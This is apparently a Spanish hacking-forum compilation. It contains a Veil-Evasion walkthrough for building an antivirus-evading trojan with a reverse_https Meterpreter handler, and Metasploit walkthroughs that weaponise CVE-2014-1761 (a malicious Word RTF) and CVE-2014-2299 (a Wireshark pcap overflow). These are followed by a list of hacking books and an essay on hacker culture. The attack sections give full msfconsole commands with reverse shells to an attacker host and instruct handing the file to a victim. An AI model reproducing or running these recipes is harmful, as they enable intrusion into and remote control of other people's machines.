Veil reverce https y Armitage





Los caballos de diligencia shellcode-less, teatralizadores Meterpreter "puros" en cierto modo similares a los caballos de diligencia reverse_tcp tradicionales. 
Reverse_https Meterpreter [s] teatralizadores son en realidad un poco más simple que reverse_tcp. La idea general es la misma: el controlador sirve un archivo dll. Que el cliente luego inyecta mediante el VirtualAlloc / etc. metodología. Sin embargo, en lugar de tener que parchear el. Dll a nosotros mismos con las instrucciones de montaje y el descriptor de fichero de un conector, el manejador de Metasploit parchea el agente de usuario, método de transporte (http / https), url y expiración / tiempo de espera de la comunicación de forma dinámica, ya que sirve el Meterpreter.





Configuramos los parametros la ip atacante y el puerto de escucha




Colocamos un nombre al troyano y nos preguntara como crear el payload la opcion 1 por defecto




Se guardara el troyano en la siguiente ruta /root/veil-output/compiled/Rhinestone.exe




Creamos la sesion de handler pero esta ves utilizando un payload de reverce https






Cita:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > set LHOST (IP)
msf exploit(handler) > set LPORT 3232
msf exploit(handler) > exploit -j


Solo hay que pasarle el troyano a la victima y esperar que lo ejecute y tendremos la sesión de meterpreter.





Veil y Armitage



Cortana es un lenguaje de scripting ataque basado en el sueño, ambas escritas por Raphael Mudge. Cortana permite la manipulación avanzada de Armitage , las versiones gratuitas y de pago de un entorno de tipo gui (y más) para Metasploit. (Nota: armitage está disponible gratuitamente en Kali con apt-get install armitage). Con Cortana, puede disparar en eventos específicos o acciones del usuario, interactuar con el backend Metasploit completo, modificar los menús, y mucho más. Hay algunos buenos ejemplos en github de Raffi de lo que usted puede hacer con este potente lenguaje a su alcance. 

Velo-Evasion en Armitage utilizando Cortana. Con el fin de obtener la estructura de menú deseado, Armitage (licencia BSD) código de fondo fue despojado de distancia y menús personalizados se construyeron utilizando ejemplos de código existentes de Raffi. Para cargar el guión veil_evasion.cna en Armitage, vaya a Armitage -> Scripts, seleccione el botón Cargar y navegue hasta el guión veil_evasion.cna:























Aparece una nueva pestaña en la parte superior Veil-Evasion, solo nos queda configurar el troyano pero esta vez con un entorno grafico amigable , mi recomendación es aunque armitage es bastante bueno siempre es mejor aprender manualmente cada funcion, pero para la organización de las pcs infectadas es bueno por su sistema grafico de host.




Hacking 2 collection books


Segunda Parte Hacking collection books


Estos libros son como oro para mí son todas las técnicas y practicas que he estado posteando en la zona y cosas que no he publicado por que son elementales a la hora de aprender,a pesar que todas estan en ingles son de gran ayuda para profundizar un tema en concreto,asi que denle un buen uso y no sean vagos a la hora de leer y  practicar lo aprendido.Algunos libros son de extensión PDF Y EPUB necesitan el programa adobe digital editions para abrir la extensión EPUB.

Descargar:



1.Pruebas de Penetración: Una introducción práctica a la piratería






2.Google Apps Script para principiantes







3.Windows PowerShell 4.0 para. NET Desarrolladores







4.Ciberseguridad: Administración de Sistemas, la realización de pruebas, e investigación de Intrusiones







5.Kali Linux - Garantizar la seguridad de las pruebas de penetración






6.iPad y iPhone Kung Fu: consejos, trucos, consejos, y Hacks para iOS 7







7.Android Seguridad Cookbook








8-Kali Linux Ingeniería Social








9.Análisis de la red con Wireshark Cookbook






10.Pruebas de Penetración con BackBox





Bug de Word 2010/2013 (Explotando)







En este módulo se crea un archivo RTF malicioso que al abrirse en versiones vulnerables de Microsoft Word dará lugar a la ejecución de código. Existe la falla en la forma de un campo de recuento lista de invalidación puede ser modificada para tratar una estructura como la otra. Este error se consideró inicialmente la explotación en la partida salvaje en abril de 2014. Este módulo fue creado mediante la inversión de una muestra pública malware.

Microsoft Word 2003 Service Pack 3, 2007 SP3, 2010 SP1 y SP2, 2013, y 2013 RT; Word Viewer; Compatibilidad de Office Paquete SP3; Office 2011 para Mac; Word Automation Services en Server 2010 SP1 y SP2 y 2013 de SharePoint; Office Web Apps 2010 SP1 y SP2; y Office Web Apps Server 2013 permite a atacantes remotos ejecutar código arbitrario o causar una denegación de servicio (corrupción de memoria) a través de datos RTF artesanales.

Exploit

Cita:CVE-2014-1761


Atacante

Cita:kali linux
Metasploit


Victima

Cita:Windows 7 x86






Cita:use exploit/windows/fileformat/ms14_017_rtf






Cita:set payload windows/meterpreter/reverse_tcp
set lhost (IP)
exploit

Se crea un archivo (.rtf) malicioso,solo hay que abrirlo en la pc victima.




creamos una conexion de handler para que cuando abramos el archivo (.rtf) se conecte 
a la pc atacante,configuramos nuestros parametros.






Cita:use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost (IP)
exploit

Abrimos el archivo ,Esperamos que conecte y nos da la sesión de meterpreter.



Bug de wireshark (Explotando)






Este módulo Metasploit provoca un desbordamiento del búfer de pila en las versiones de Wireshark 1.8.12-1.10.5 y por abajo por la generación de un archivo malicioso.

Desbordamiento de búfer en la función mpeg_read en escuchas telefónicas / mpeg.c en el analizador MPEG en Wireshark 1.8.x antes de 1.8.13 y 1.10.x antes 1.10.6 permite a atacantes remotos ejecutar código arbitrario o causar una denegación de servicio (caída de aplicación) a través de un gran récord en los datos MPEG.


Exploit

Cita:CVE-2014-2299


Atacante

Cita:kali linux
Metasploit


Victima

Cita:Windows 7 x86





Cita:use exploit/windows/fileformat/wireshark_mpeg_overflow





Cita:set payload windows/meterpreter/reverse_tcp
set lhost (IP)
set target 1
exploit




Se crea un archivo (.pcap) una captura de paquetes,que causara que el wireshark falle al ejecutar
el archivo ,solo hay que abrirlo en la pc victima.






Pero antes hay que crear una conexion de handler para que cuando abramos el archivo (.pcap) se conecte a la pc atacante,configuramos nuestros parametros.





Cita:use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.154.130
exploit


Esperamos que conecte y nos da la sesión de meterpreter.




Mentalidad “Hacker”: un paradigma diferente de educación






Nuestro modelo de educación actual está en su mayoría centrado en la cultura del sentarse y escuchar, la cual es a su vez reforzada por los medios y los productos de consumo; incentivando un tipo de comportamiento que reduce a las personas a un rol pasivo, de esponja, sin ningún incentivo para la innovación. Por otro lado, los llamados “hackers” son el mejor ejemplo de una cultura centrada en el hacer y crear, creen que desarmando las cosas, viendo cómo funcionan y usando ese conocimiento para desarrollar cosas nuevas y más interesantes, es que el ser humano puede aprender lecciones fundamentales sobre cómo es el mundo que lo rodea.

Como lo discutí en una columna anterior, “hackear” no es sinónimo de violar la seguridad de un sistema informático, es una manera de asimilar la tecnología, explorando sus límites y haciendo que las cosas funcionen con un propósito y un significado, en muchos casos usando pensamiento lateral y métodos no ortodoxos pero dentro de un contexto de legalidad.

El crecimiento del movimiento “hacker” ha dado lugar a una cultura subyacente y a la ética “hacker”, que proponen la curiosidad como el motor detrás de la producción del conocimiento, exponiendo la necesidad de reconocer que las personas sean autónomas y libres en la exploración de sus intereses, compartiendo con sus pares no sólo la información sino también las herramientas.

Un “hacker” es, simplemente el que no se conforma, el que se divierte con el ingenio y siempre intenta ir un poco más allá, que no puede ver una puerta cerrada sin sentir el deseo de abrirla y que siempre está dispuesto a esforzarse para entender cómo funciona el mundo que tiene a su alrededor. Puede haber “hackers” en cualquier actividad, no solo en la informática, también hay por ejemplo “hackers” del cuerpo humano, que utilizan técnicas creativas para mejorar el desempeño en actividades físicas o intelectuales. 

La historia de la ciencia está llena de ejemplos de “hackers” que en su momento fueron catalogados de científicos locos precisamente por su forma de abordar un problema desviándose de los estándares, como el caso del Doctor Ignaz Philipp Semmelweis quién tuvo la descabellada idea de pensar que algunas enfermedades eran transmitidas a pacientes sanos por la falta de higiene del personal médico y se atrevió a sugerir que los médicos deberían lavarse las manos antes de una intervención quirúrgica, lo cual chocó con las creencias de la sociedad médica de la época. 

Si esta cultura “hacker” es un mecanismo de fomento a la innovación y queda claro que sus valores son nobles, creativos e igualitarios y poco o nada tienen que ver con la “villanización” que los medios han hecho de ella, tendría sentido pensar el introducirla al sistema educativo transformando la cultura del “sentarse y escuchar” a una cultura del “hacer”.

A diferencia del modelo educativo basado en libros de texto y lecciones aprendidas de memoria, un profesor “hacker” debería tratar de devolverle la dignidad a los estudiantes, darles la certeza de que no sólo es posible cambiar el mundo, sino que las herramientas están ahí afuera y no se necesita mucho para comenzar.

El paradigma educativo del “hacker” propone que el conocimiento no se construye antes o después del proceso de hacer algo, sino que se construye mientras lo hacemos, generando un tipo de satisfacción muy particular en el alumno: la sensación de tener un impacto directo sobre el mundo. 

Posiblemente lo mas revolucionario que traería la cultura “hacker” en la escuela, es la idea que el copiar no es malo. En la ética del “hacker”, un principio fundamental es la necesidad de compartir y reutilizar el conocimiento y las herramientas, de manera que otros puedan trabajar en el mejoramiento de las mismas evitando tener que recorrer el mismo camino que otros ya sufrieron. 

Todos los días escuchamos invitaciones a cambiar el mundo que no proponen ninguna idea de cómo hacerlo, en cambio, la introducción de una cultura “hacker” en la escuela llama a una acción inmediata: para cambiar el mundo hay que hacer cosas en contra de lo establecido y hay que hacerlas ahora.

Jue, 06/05/2014 
Autor:Javier Villamizar